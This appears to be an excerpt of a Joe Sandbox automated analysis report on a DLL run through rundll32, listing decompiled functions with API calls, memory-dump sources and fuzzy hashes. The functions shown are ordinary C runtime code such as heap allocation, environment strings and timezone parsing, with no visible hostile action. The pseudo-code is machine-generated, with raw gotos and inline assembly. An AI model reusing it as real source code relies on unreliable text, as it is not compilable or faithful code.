7275->7279 7338 7ffa535ee398 7275->7338 7276 7ffa535ee9e4 7276->7275 7277 7ffa535e7e58 __vcrt_freeptd 15 API calls 7276->7277 7277->7275 7279->7270 7281 7ffa535e8a4d 7280->7281 7282 7ffa535e8a52 7280->7282 7345 7ffa535eda58 7281->7345 7287 7ffa535e8a9b 7282->7287 7350 7ffa535e7fb0 7282->7350 7286 7ffa535e8a71 7291 7ffa535e7e58 __vcrt_freeptd 15 API calls 

                Control-flow Graph

                C-Code - Quality: 100%
                			E00007FFA7FFA535E2EC0(void* __eax, void* __rdx) {
                				void* _t3;
                				void* _t6;
                
                				_t6 = _t3;
                				if (_t6 == 0) goto 0x535e2f01;
                				if (_t6 == 0) goto 0x535e2ef5;
                				if (_t6 == 0) goto 0x535e2ee8;
                				if (_t3 == 1) goto 0x535e2ee1;
                				return 1;
                			}






                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                • String ID:
                • API String ID: 3885183344-0
                • Opcode ID: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction ID: bbf71c4312eac89eec456935d9a7b20769ad314045f6b1ccab871f67e16a33f4
                • Opcode Fuzzy Hash: 3b09c40dbe3440787c7c5c53ee7d12fadfcf4d07a70367e36c859bbc1eee5872
                • Instruction Fuzzy Hash: FD519361D3CF034DFA54ABA194422B9225BAFD7380F8CE0B5E68D67797CE2DE445A700
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                APIs
                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEE65
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEEC7
                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF01
                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFA535E7533,?,?,?,00007FFA535E74EE), ref: 00007FFA535EEF2B
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                • String ID:
                • API String ID: 1557788787-0
                • Opcode ID: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction ID: c642c8e6f55a933ada6c5ae1589ddf869c047f612db210b5182ab2b7cf1b367b
                • Opcode Fuzzy Hash: 57fcc6d14fadeefd58268156dcdd6c0be34df16fb2c93034868b229699ff29a0
                • Instruction Fuzzy Hash: C3216421E39B9585E6209F11644002AB6A9FF89BD0B4CA174DE9E73BD8DF3CE4519740
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 57%
                			E00007FFA7FFA535E7350(void* __ecx, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                				long long _v56;
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t27;
                				void* _t28;
                				void* _t30;
                				intOrPtr _t35;
                				void* _t41;
                				intOrPtr* _t61;
                				intOrPtr* _t62;
                				long long _t68;
                				void* _t70;
                				long long _t84;
                				signed int _t85;
                				void* _t86;
                				intOrPtr* _t87;
                				void* _t90;
                
                				_t70 = __rcx;
                				_a8 = __rbx;
                				_t2 = _t70 - 1; // -1
                				r14d = __ecx;
                				if (_t2 - 1 <= 0) goto 0x535e7384;
                				_t27 = E00007FFA7FFA535E8380(_t61);
                				 *_t61 = 0x16;
                				_t28 = E00007FFA7FFA535E8260(_t27);
                				goto 0x535e74b3;
                				E00007FFA7FFA535EEA94(_t28, _t41, _t61, _t86);
                				r8d = 0x104;
                				GetModuleFileNameA(??, ??, ??);
                				_t87 =  *0x53755730; // 0x21991b53370
                				 *0x53755740 = 0x53754cf0;
                				if (_t87 == 0) goto 0x535e73bb;
                				if ( *_t87 != dil) goto 0x535e73be;
                				_t62 =  &_a32;
                				_a24 = _t85;
                				_v56 = _t62;
                				r8d = 0;
                				_a32 = _t85;
                				_t30 = E00007FFA7FFA535E7130(0, 0x53754cf0, 0x53754cf0, 0x53754cf0, _t85, 0x53754cf0, _t90, __r8,  &_a24);
                				r8d = 1;
                				E00007FFA7FFA535E72EC(_t30, _a24, _a32, __r8);
                				_t68 = _t62;
                				if (_t62 != 0) goto 0x535e740f;
                				E00007FFA7FFA535E8380(_t62);
                				_t10 = _t68 + 0xc; // 0xc
                				 *_t62 = _t10;
                				goto 0x535e74ae;
                				_v56 =  &_a32;
                				E00007FFA7FFA535E7130(0, _t68, 0x53754cf0, _t68, _t85, 0x53754cf0, _t90, _t62 + _a24 * 8,  &_a24);
                				if (r14d != 1) goto 0x535e7445;
                				_t35 = _a24 - 1;
                				 *0x53755720 = _t68;
                				 *0x5375571c = _t35;
                				goto 0x535e7408;
                				_a16 = _t85;
                				0x535ee390();
                				if (_t35 == 0) goto 0x535e7474;
                				E00007FFA7FFA535E7E58( &_a32, _a16);
                				_a16 = _t85;
                				E00007FFA7FFA535E7E58( &_a32, _t68);
                				goto 0x535e74b3;
                				_t84 = _a16;
                				if ( *_t84 == _t85) goto 0x535e748f;
                				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x535e7483;
                				 *0x5375571c = 0;
                				_a16 = _t85;
                				 *0x53755720 = _t84;
                				E00007FFA7FFA535E7E58(_t84 + 8, _t85 + 1);
                				_a16 = _t85;
                				E00007FFA7FFA535E7E58(_t84 + 8, _t68);
                				return _t35;
                			}






















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: FileModuleName_invalid_parameter_noinfo
                • String ID: C:\Windows\SYSTEM32\rundll32.exe
                • API String ID: 3307058713-2484965969
                • Opcode ID: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction ID: 7db2ba504eb390c77247faff789e8d262208319ca8554e8c7cd5565de7da5005
                • Opcode Fuzzy Hash: 0b6cb0882f23a2b5e3a001a1a1574599cc91a4ef05d18a512e42ec2301af3a4b
                • Instruction Fuzzy Hash: FD41A132A28F528AEB15DF31A4400BC6BAAEF86BD0B4C9075ED4EA7745DF3DE4419340
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 65%
                			E00007FFA7FFA535E33BC(void* __ebx, void* __rcx) {
                				void* __rbx;
                				void* _t11;
                				void* _t13;
                				void* _t18;
                				void* _t19;
                				void* _t21;
                
                				_t2 =  ==  ? 1 :  *0x53754b08 & 0x000000ff;
                				 *0x53754b08 =  ==  ? 1 :  *0x53754b08 & 0x000000ff;
                				E00007FFA7FFA535E3914( ==  ? 1 :  *0x53754b08 & 0x000000ff, 1, _t11, _t13, _t19, _t21);
                				if (E00007FFA7FFA535E42EC() != 0) goto 0x535e33eb;
                				goto 0x535e33ff; // executed
                				E00007FFA7FFA535E7DD4(_t18); // executed
                				if (0 != 0) goto 0x535e33fd;
                				E00007FFA7FFA535E4348(0);
                				goto 0x535e33e7;
                				return 1;
                			}










                APIs
                • __isa_available_init.LIBCMT ref: 00007FFA535E33D9
                • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFA535E33DE
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFA535E42F0
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFA535E42F5
                  • Part of subcall function 00007FFA535E42EC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFA535E42FA
                • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFA535E33F6
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                • String ID:
                • API String ID: 3388242289-0
                • Opcode ID: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction ID: a76ceec288fbaf6dc7bb4001ceb0d604b93e307e3b988afb1047b141132d1c70
                • Opcode Fuzzy Hash: 9f98b25316a4bfb7b7888dd646c33a76e946e665d901a34c7cd22b4946b12760
                • Instruction Fuzzy Hash: 86E01250D3DB424DFE5927E11082AB8275A0F9B301F4DE0F5D95D72183CD0D6599B521
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 58%
                			E00007FFA7FFA535EFE8C(void* __eax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, long long _a8, long long _a16, long long _a24) {
                				long long _v24;
                				void* _t19;
                				intOrPtr _t22;
                				intOrPtr _t24;
                				intOrPtr _t25;
                				void* _t29;
                				long long _t39;
                				signed long long _t45;
                
                				_a8 = __rbx;
                				_a16 = __rsi;
                				_a24 = __rdi;
                				if ((0 | _t29 - 0x00002000 > 0x00000000) != 0) goto 0x535efec9;
                				_t19 = E00007FFA7FFA535E8380(_t39);
                				 *_t39 = 9;
                				E00007FFA7FFA535E8260(_t19);
                				goto 0x535eff2d;
                				E00007FFA7FFA535ED6A8();
                				_t45 = __rbx;
                				_v24 = __rbx;
                				_t22 =  *0x53755250; // 0x40
                				if (_t29 - _t22 < 0) goto 0x535eff21;
                				if ( *((intOrPtr*)(0x53754e50 + __rbx * 8)) == __rbx) goto 0x535efef5;
                				goto 0x535eff17; // executed
                				E00007FFA7FFA535EFDA4(_t39, __rbx, __rsi, __rbp); // executed
                				 *((long long*)(0x53754e50 + _t45 * 8)) = _t39;
                				if (_t39 != 0) goto 0x535eff08;
                				goto 0x535eff21;
                				_t24 =  *0x53755250; // 0x40
                				_t25 = _t24 + 0x40;
                				 *0x53755250 = _t25;
                				_v24 = _t45 + 1;
                				goto 0x535efee2;
                				E00007FFA7FFA535ED6FC();
                				goto 0x535efec5;
                				return _t25;
                			}












                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID:
                • API String ID: 3215553584-0
                • Opcode ID: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction ID: bf7679defbbe6ecab329ff359acfa1e7b28f8dd3f48751efd3df88309eeae16a
                • Opcode Fuzzy Hash: f182c36d18bb0558c4e136d7a85a6dd1f9f42aaf76e98a9eed0fe9a62827462d
                • Instruction Fuzzy Hash: ED114C22D2DF828AF6109F50A44057963AAFFC2780F5EA075F69D67796DF2CF800A750
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 44%
                			E00007FFA7FFA535E7FB0(void* __eax, signed int __rcx, signed int __rdx) {
                				void* __rbx;
                				intOrPtr* _t22;
                				signed int _t29;
                
                				_t29 = __rdx;
                				if (__rcx == 0) goto 0x535e7fcf;
                				_t1 = _t29 - 0x20; // -32
                				_t22 = _t1;
                				if (_t22 - __rdx < 0) goto 0x535e8012;
                				_t25 =  ==  ? _t22 : __rcx * __rdx;
                				goto 0x535e7ff6;
                				if (E00007FFA7FFA535EF900(1) == 0) goto 0x535e8012;
                				if (E00007FFA7FFA535EF4E8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x535e8012;
                				RtlAllocateHeap(??, ??, ??); // executed
                				if (_t22 == 0) goto 0x535e7fe1;
                				goto 0x535e801f;
                				E00007FFA7FFA535E8380(_t22);
                				 *_t22 = 0xc;
                				return 0;
                			}







                APIs
                • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA535E8B04,?,?,00009BD95A2971B4,00007FFA535E8389,?,?,?,?,00007FFA535E7E7D,?,?,?), ref: 00007FFA535E8005
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction ID: a9e670807884ebb764c2cba4b8859986aa21cdf9515bc769ee08227e5fc957a5
                • Opcode Fuzzy Hash: 95bd6b468405d17fa2efb7e683ed559ac8666e7fb7fc56f28944b4f6525edaca
                • Instruction Fuzzy Hash: 1AF06D41B2AB0689FE59976258103B9529B5FCAB60F0CF4B0C91EA62D1DE2CE480B220
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 44%
                			E00007FFA7FFA535E7E98(void* __rcx) {
                				void* __rbx;
                				intOrPtr* _t14;
                
                				if (__rcx - 0xffffffe0 > 0) goto 0x535e7ee3;
                				_t16 =  ==  ? _t14 : __rcx;
                				goto 0x535e7eca;
                				if (E00007FFA7FFA535EF900(1) == 0) goto 0x535e7ee3;
                				if (E00007FFA7FFA535EF4E8(_t14,  ==  ? _t14 : __rcx,  ==  ? _t14 : __rcx) == 0) goto 0x535e7ee3;
                				RtlAllocateHeap(??, ??, ??); // executed
                				if (_t14 == 0) goto 0x535e7eb5;
                				goto 0x535e7ef0;
                				E00007FFA7FFA535E8380(_t14);
                				 *_t14 = 0xc;
                				return 0;
                			}






                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction ID: 4ede43ae513be3baac5debab2facc92d28265a310ba8b1bee03fc949d1967733
                • Opcode Fuzzy Hash: 480c0af5c5187464a18a8393c16ff6192f5d8bbdf6fdb0e3d4f81ab0fce67787
                • Instruction Fuzzy Hash: 94F01211F3DB4649FE6497715901279519B9FC6760F0CEAB4DD2EE52C1DE6CA840A120
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 95%
                			E00007FFA7FFA535EB2BC(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, void* __rdx, void* __r9, void* __r11, long long _a8, signed int _a16, signed int _a24) {
                				void* _v351701864;
                				void* __rdi;
                				void* __rsi;
                				void* _t26;
                				intOrPtr _t36;
                				signed int _t38;
                				void* _t40;
                				signed int _t43;
                				void* _t45;
                				void* _t46;
                				signed int _t61;
                				signed char* _t69;
                				void* _t77;
                				intOrPtr* _t92;
                				signed char* _t94;
                				signed int* _t95;
                				intOrPtr* _t97;
                				char* _t98;
                				intOrPtr* _t99;
                				char* _t100;
                				void* _t101;
                				char* _t102;
                				void* _t103;
                				intOrPtr* _t104;
                				signed char* _t109;
                				signed char* _t113;
                				signed long long _t121;
                				signed long long _t122;
                				intOrPtr* _t125;
                				void* _t137;
                				void* _t138;
                
                				_t137 = __r11;
                				_t92 = __rax;
                				_a8 = __rbx;
                				_t97 = __rcx;
                				E00007FFA7FFA535EAA38(_t26);
                				r14d = 0;
                				_a16 = r14d;
                				_t125 = _t92;
                				_a24 = r14d;
                				if (E00007FFA7FFA535EAAA0(__ecx, _t92,  &_a16, __rdx) != 0) goto 0x535eb4f5;
                				if (E00007FFA7FFA535EAA40(__ecx, _t92,  &_a24, __rdx) != 0) goto 0x535eb4e0;
                				_t109 =  *0x53755278; // 0x0
                				_t69 = _t109;
                				if (_t69 == 0) goto 0x535eb339;
                				r9d = __rcx[_t109 - __rcx] & 0x000000ff;
                				if (_t69 != 0) goto 0x535eb331;
                				_t94 =  &(__rcx[1]);
                				if (r9d != 0) goto 0x535eb31c;
                				if (( *__rcx & 0x000000ff) - r9d == 0) goto 0x535eb490;
                				E00007FFA7FFA535E7E58(_t94, _t109);
                				_t122 = _t121 | 0xffffffff;
                				if ( *((intOrPtr*)(_t97 + _t122 + 1)) != r14b) goto 0x535eb345;
                				E00007FFA7FFA535E7E98(_t122 + 2);
                				 *0x53755278 = _t94;
                				E00007FFA7FFA535E7E58(_t94, _t122 + 2);
                				_t113 =  *0x53755278; // 0x0
                				if (_t113 == 0) goto 0x535eb490;
                				_t123 = _t122 + 1;
                				if ( *((intOrPtr*)(_t97 + _t122 + 1)) != r14b) goto 0x535eb374;
                				if (E00007FFA7FFA535E7EF8(__ebx, 0, _t94, _t97, _t113, _t122 + 2, _t97) != 0) goto 0x535eb4cb;
                				_t10 =  &(_t94[3]); // 0x3
                				r13d = _t10;
                				r9d = r13d;
                				if (E00007FFA7FFA535F1998(_t97,  *_t125, _t122 + 2, __r9) != 0) goto 0x535eb4b6;
                				_t77 =  *_t97 - r14b;
                				if (_t77 == 0) goto 0x535eb3bf;
                				_t98 = _t97 + 1;
                				if (_t77 != 0) goto 0x535eb3b1;
                				dil =  *_t98 == 0x2d;
                				if (dil == 0) goto 0x535eb3ce;
                				_t99 = _t98 + 1;
                				_a16 = E00007FFA7FFA535E8028(0, __esi, _t94, _t99, _t99, _t123 - 1, _t125, __r9, _t137) * 0xe10;
                				_t36 =  *_t99;
                				if (_t36 == 0x2b) goto 0x535eb3eb;
                				if (_t36 - 0x30 - 9 > 0) goto 0x535eb3f0;
                				_t100 = _t99 + 1;
                				goto 0x535eb3df;
                				if ( *_t100 != 0x3a) goto 0x535eb441;
                				_t101 = _t100 + 1;
                				_t38 = E00007FFA7FFA535E8028(0, __esi, _t94, _t101, _t101, _t123 - 1, _t125, __r9, _t137);
                				_a16 = _a16 + _t38 * 0x3c;
                				goto 0x535eb414;
                				if (_t38 - 0x39 > 0) goto 0x535eb41a;
                				_t102 = _t101 + 1;
                				if ( *_t102 - 0x30 >= 0) goto 0x535eb40d;
                				if ( *_t102 != 0x3a) goto 0x535eb441;
                				_t103 = _t102 + 1;
                				_t40 = E00007FFA7FFA535E8028(_t38 * 0x3c, __esi, _t94, _t103, _t103, _t123 - 1, _t125, __r9, _t137);
                				_t61 = _a16 + _t40;
                				_a16 = _t61;
                				goto 0x535eb43b;
                				if (_t40 - 0x39 > 0) goto 0x535eb441;
                				_t104 = _t103 + 1;
                				if ( *_t104 - 0x30 >= 0) goto 0x535eb434;
                				if (dil == 0) goto 0x535eb44b;
                				_a16 =  ~_t61;
                				_t43 = r14d & 0xffffff00 |  *_t104 != r14b;
                				_a24 = _t43;
                				if (_t43 == 0) goto 0x535eb475;
                				if (E00007FFA7FFA535F1998(_t104,  *((intOrPtr*)(_t125 + 8)), _t122 + 2, _t138) == 0) goto 0x535eb47c;
                				goto 0x535eb4a1;
                				_t95 =  *((intOrPtr*)(_t125 + 8));
                				 *_t95 = r14b;
                				_t45 = E00007FFA7FFA535EAA30(_t44);
                				 *_t95 = _a16;
                				_t46 = E00007FFA7FFA535EAA20(_t45);
                				 *_t95 = _a24;
                				return _t46;
                			}



































                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                • String ID: -$:$:$?
                • API String ID: 3440502458-92861585
                • Opcode ID: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction ID: 756c227052dadb24578371188295bad3d939e5f8e6516c62854f8c487d6c8fc2
                • Opcode Fuzzy Hash: a800f810628b4c4f7b106cf84e93ca30267a0bac2c5ec4204c3e996c6b5a40af
                • Instruction Fuzzy Hash: 22E11532A2CB824EE764CF3194416B9276BFFC6784F4CA175EA4E62A95DF3CE4419700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00007FFA7FFA535E9EA0(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __eflags, long long __rbx, signed int* __r8, void* __r10) {
                				void* __rdi;
                				void* __rsi;
                				void* __rbp;
                				void* _t52;
                				signed short _t53;
                				signed short _t55;
                				void* _t63;
                				void* _t64;
                				void* _t69;
                				void* _t70;
                				void* _t72;
                				void* _t74;
                				signed short _t75;
                				void* _t76;
                				void* _t79;
                				void* _t84;
                				signed int _t107;
                				signed int _t108;
                				signed int _t111;
                				signed int _t115;
                				void* _t117;
                				void* _t118;
                				signed int _t122;
                				void* _t123;
                				void* _t137;
                				signed long long _t138;
                				void* _t165;
                				void* _t167;
                				void* _t168;
                				void* _t171;
                				void* _t172;
                				void* _t174;
                				signed long long _t175;
                				void* _t183;
                				void* _t186;
                				void* _t188;
                				void* _t190;
                
                				_t181 = __r10;
                				_t140 = __rbx;
                				_t112 = __ebp;
                				_t137 = _t174;
                				 *((long long*)(_t137 + 0x20)) = __rbx;
                				_t172 = _t137 - 0x5f;
                				_t175 = _t174 - 0xe0;
                				asm("movaps [eax-0x48], xmm6");
                				asm("movaps [eax-0x58], xmm7");
                				asm("inc esp");
                				asm("inc esp");
                				asm("inc esp");
                				_t138 =  *0x53754140; // 0x9bd95a2971b4
                				 *(_t172 - 0x39) = _t138 ^ _t175;
                				asm("inc esp");
                				asm("movss [esp+0x20], xmm0");
                				_t164 = _t175 + 0x20;
                				asm("repe inc esp");
                				asm("repe inc esp");
                				_t53 = E00007FFA7FFA535E9354(_t52, __ebx, __ecx, __rbx, _t175 + 0x28, _t175 + 0x20, _t167, _t190);
                				_t107 = _t53 & 0x0000ffff;
                				E00007FFA7FFA535E8FAC(_t53, __ecx, 0, _t175 + 0x30, _t175 + 0x20, _t165, _t167, __r8);
                				r15d = 0;
                				_t111 = _t53 & 0x0000ffff;
                				if (__r8 == 0) goto 0x535e9f2e;
                				 *__r8 = r15w;
                				asm("inc ebp");
                				_t115 = _t111;
                				if (_t115 != 0) goto 0x535e9f3f;
                				asm("inc ebp");
                				if (_t115 != 0) goto 0x535e9f3f;
                				if (_t115 == 0) goto 0x535e9f7b;
                				r14d = 1;
                				asm("movss xmm1, [esp+0x20]");
                				if (_t107 >= 0) goto 0x535ea340;
                				_t117 = ( *(_t175 + 0x28) & 0x0000ffff) - r14w;
                				if (_t117 != 0) goto 0x535e9f88;
                				asm("ucomiss xmm1, [0x86f92]");
                				if (_t117 != 0) goto 0x535e9f6a;
                				if (_t117 == 0) goto 0x535e9f7b;
                				_t118 = _t111 - r14w;
                				if (_t118 != 0) goto 0x535e9f88;
                				asm("ucomiss xmm1, [0x86fb5]");
                				if (_t118 != 0) goto 0x535e9f88;
                				if (_t118 != 0) goto 0x535e9f88;
                				asm("movss xmm0, [0x869b1]");
                				goto 0x535ea3ae;
                				if (r15w - _t107 <= 0) goto 0x535ea340;
                				if (r15w - _t111 < 0) goto 0x535ea340;
                				if (( *(_t175 + 0x22) & 0x00008000) == 0) goto 0x535e9fc2;
                				_t122 = _t111;
                				if (_t122 >= 0) goto 0x535e9fc2;
                				_t83 = r14d;
                				_t55 = E00007FFA7FFA535E90CC( *(_t175 + 0x28) & 0x0000ffff, 0x8000, r14d, 0, _t107, _t138 ^ _t175, _t140, _t175 + 0x30);
                				asm("movss xmm0, [0x87c13]");
                				goto 0x535ea3ae;
                				_t108 = _t107 | 0xffffffff;
                				asm("inc ecx");
                				if (_t122 <= 0) goto 0x535e9fd1;
                				r13d = r15w & 0xffffffff;
                				goto 0x535e9ff9;
                				asm("xorps xmm1, [0x86978]");
                				asm("movss [esp+0x20], xmm1");
                				E00007FFA7FFA535E8FAC(_t55, r14d, _t108, _t175 + 0x30, _t175 + 0x20, _t165, _t167, __r8);
                				asm("movss xmm1, [esp+0x20]");
                				r13d = _t55 & 0x0000ffff;
                				asm("movss xmm0, [0x87c0f]");
                				asm("comiss xmm0, xmm1");
                				if (_t122 <= 0) goto 0x535ea016;
                				asm("mulss xmm1, [0x8692a]");
                				 *(_t175 + 0x28) = ( *(_t175 + 0x28) & 0x0000ffff) + _t108;
                				asm("movaps xmm0, xmm1");
                				asm("subss xmm0, [0x86913]");
                				asm("addss xmm1, [0x8690b]");
